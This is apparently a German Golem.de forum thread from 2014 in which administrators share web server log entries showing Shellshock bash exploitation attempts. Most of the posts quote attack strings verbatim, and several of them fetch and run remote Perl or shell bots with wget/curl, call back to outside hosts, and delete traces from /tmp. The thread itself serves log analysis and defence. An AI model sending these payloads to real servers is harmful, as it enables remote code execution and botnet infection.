Abo
  1. Foren
  2. Kommentare
  3. Security
  4. Alle Kommentare zum Artikel
  5. › Bash-Lücke: Die Hintergründe zu…

In Logs fündig geworden?

  1. Thema

Neues Thema Ansicht wechseln


  1. In Logs fündig geworden?

    Autor: c3rl 26.09.14 - 19:39

    Habe folgende Zeilen in meinen nginx-Logs gefunden... habt ihr auch was gefunden?

    >24.251.197.244 - - [25/Sep/2014:09:13:51 +0200] "GET / HTTP/1.1" 301 5 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"

    >24.251.197.244 - - [25/Sep/2014:09:13:52 +0200] "GET / HTTP/1.1" 200 6023 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"

    >89.207.135.125 - - [25/Sep/2014:11:03:27 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

    >166.78.61.142 - - [25/Sep/2014:16:46:54 +0200] "GET / HTTP/1.1" 301 5 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

    >93.103.21.231 - - [26/Sep/2014:14:39:35 +0200] "GET / HTTP/1.1" 301 5 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://xxxxxx.de/'"



    1 mal bearbeitet, zuletzt am 26.09.14 19:41 durch c3rl.

  2. Re: In Logs fündig geworden?

    Autor: Kastenbrot 26.09.14 - 20:16

    Jep, da war auch einer, aber der war recht "harmlos" xD

    access.log:209.126.230.72, 209.126.230.72 - - [25/Sep/2014:04:32:27 +0200] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    access.log:209.126.230.72, 209.126.230.72 - - [25/Sep/2014:09:17:16 +0200] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    access.log:209.126.230.72, 209.126.230.72 - - [25/Sep/2014:09:28:14 +0200] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)

  3. Re: In Logs fündig geworden?

    Autor: Pythonimus 27.09.14 - 12:31

    89.207.135.125 - - [25/Sep/2014:11:40:09 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 4338 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

    109.202.102.224 - - [25/Sep/2014:16:22:50 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 4338 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22"

  4. Re: In Logs fündig geworden?

    Autor: Jack0 27.09.14 - 13:48

    Den
    89.207.135.125 - - [25/Sep/2014:13:27:23 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 474 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    hatte ich auch.
    Scan aus Holland, der einen Ping nach USA auslösen soll?

  5. Re: In Logs fündig geworden?

    Autor: Kastenbrot 27.09.14 - 14:00

    Den hier fand ich auch ganz witzig:

    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET / HTTP/1.0" 200 456 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /test HTTP/1.0" 404 484 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET / HTTP/1.0" 200 456 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /test HTTP/1.0" 404 484 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 495 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 495 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""

    Was ich recht spannend finde, ist die Tatsache dass man via Varnish solchen Mist rausfiltern kann so das er nicht den Apache erreicht und nebenbei F2B zum blocken nutzen oder einen Hive zum Blocken und anschließenden Angriff des Scanners nutzen kann.
    Ab hier geht der ScanSpaß schnell nach hinten los.

  6. Re: In Logs fündig geworden?

    Autor: Anonymer Nutzer 27.09.14 - 14:27

    root@XXXXXX:~# cat /var/log/apache2/error.log | grep 89.207
    [Thu Sep 25 10:21:55 2014] [error] [client 89.207.135.125] File does not exist: /var/www/cgi-sys


    Der arme Schlumpf wurde aber von Fail2Ban gesperrt für 1 Jahr :(

  7. Re: In Logs fündig geworden?

    Autor: Jack0 28.09.14 - 10:57

    xxx.xx:80 94.102.63.238 - - [28/Sep/2014:00:21:09 +0200] "GET /cgi-bin/php? HTTP/1.1" 404 482 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"

    jetzt wollen sie's aber wissen -.-

  8. Re: In Logs fündig geworden?

    Autor: Kastenbrot 28.09.14 - 15:10

    Jop scheinbar schon...
    access.log:82.97.2.26 - - [28/Sep/2014:12:21:14 +0200] "GET / HTTP/1.0" 200 177 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
    access.log:82.97.2.26, 82.97.2.26 - - [28/Sep/2014:12:21:24 +0200] "GET / HTTP/1.0" 200 177 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
    Ich glaub ich troll jetzt mal zurück... Hab irgendwie Spaß daran gefunden...

  9. Re: In Logs fündig geworden?

    Autor: ello 02.10.14 - 10:37

    Hatten heute auch den ersten, der wäre eventuell nicht so harmlos gewesen :)

    174.143.168.121 - - [02/Oct/2014:05:02:52 +0200] "GET //cgi-bin/bash HTTP/1.0" 301 480 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"" "d****************.net"
    174.143.168.121 - - [02/Oct/2014:05:02:53 +0200] "GET / HTTP/1.0" 200 51276 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"" "www.****************.net"

  10. Re: In Logs fündig geworden?

    Autor: PeterMeter 22.10.14 - 00:02

    habe auch diverse logs mit dem wget bla bla, nur mich verunsichert immer das mal 403er und manchmal kommen sie mit 200 durch. wie kann ich mir sicher sein?
    wie fuher ich so was zum test auf meinem Server selber aus?

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Zum Login

Stellenmarkt
  1. BWI GmbH, Bonn
  2. Modis GmbH, Kiel
  3. Rational AG, Landsberg am Lech
  4. GoDaddy, Ismaning

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Top-Angebote
  1. 49,94€
  2. 19,95€
  3. 13,95€
  4. (u. a. Grafikkarten, SSDs, Ram-Module reduziert)


Haben wir etwas übersehen?

E-Mail an news@golem.de


Watch Dogs Legion angespielt: Eine Seniorin als Ein-Frau-Armee
Watch Dogs Legion angespielt
Eine Seniorin als Ein-Frau-Armee

E3 2019 Elitesoldaten brauchen wir nicht - in Watch Dogs Legion hacken und schießen wir auch als Pensionistin für den Widerstand. Beim Anspielen haben wir sehr über die ebenso klapprige wie kampflustige Oma Gwendoline gelacht.


    Ada und Spark: Mehr Sicherheit durch bessere Programmiersprachen
    Ada und Spark
    Mehr Sicherheit durch bessere Programmiersprachen

    Viele Sicherheitslücken in Software sind auf Programmierfehler zurückzuführen. Diese Fehler lassen sich aber vermeiden - und zwar unter anderem durch die Wahl einer guten Programmiersprache. Ada und Spark gehören dazu, leider sind sie immer noch wenig bekannt.
    Von Johannes Kanig

    1. Das andere How-to Deutsch lernen für Programmierer
    2. Programmiersprachen, Pakete, IDEs So steigen Entwickler in Machine Learning ein

    5G-Auktion: Warum der Preis der 5G-Frequenzen so hoch war
    5G-Auktion
    Warum der Preis der 5G-Frequenzen so hoch war

    Dass die Frequenzen für den 5G-Mobilfunk teuer wurden, lasten Telekom, Vodafone und Telefónica dem Newcomer United Internet an. Doch dies ist laut dem Netzplaner Kai Seim nicht so gewesen.
    Eine Analyse von Achim Sawall

    1. Funklöcher Hohe Bußgelder gegen säumige Mobilfunknetzbetreiber
    2. Bundesnetzagentur 5G-Frequenzauktion erreicht 6,5 Milliarden Euro
    3. 5G-Auktion Etablierte wollen Preis für 1&1 Drillisch hochtreiben

    1. Funklöcher: Telekom weist Vorwürfe zu schlechtem Antennenstandort zurück
      Funklöcher
      Telekom weist Vorwürfe zu schlechtem Antennenstandort zurück

      Nach den Vorwürfen eines Ortsteilbürgermeisters bei der Standortauswahl in einem Ort in Thüringen sieht sich die Telekom missverstanden. Auch sei die Ausleuchtung beider Ortsteile mit einer Antenne nicht möglich, sagt ein Sprecher.

    2. Bethesda: Wolfenstein Youngblood erscheint mit Nazis und Hakenkreuzen
      Bethesda
      Wolfenstein Youngblood erscheint mit Nazis und Hakenkreuzen

      Kein anonymes Regime, sondern Nazis und keine erfundenen Symbole, sondern Hakenkreuze: Wolfenstein Youngblood und das VR-Actionspiel Cyberpilot erscheinen auch in Deutschland in einer ungeschnittenen Version.

    3. Roli Lumi: Mit LED-Keyboard und Guitar-Hero-Klon musizieren lernen
      Roli Lumi
      Mit LED-Keyboard und Guitar-Hero-Klon musizieren lernen

      Roli will Anfängern den Einstieg in das Musikmachen erleichtern und finanziert deshalb auf Kickstarter das Roli-Lumi-Keyboard mit passender App. Nutzer lernen damit, Lieder zu spielen, indem das Keyboard die richtigen Tasten aufleuchten lässt. Es lassen sich zwei Keyboards zu einem größeren zusammenstecken.


    1. 18:13

    2. 17:54

    3. 17:39

    4. 17:10

    5. 16:45

    6. 16:31

    7. 15:40

    8. 15:27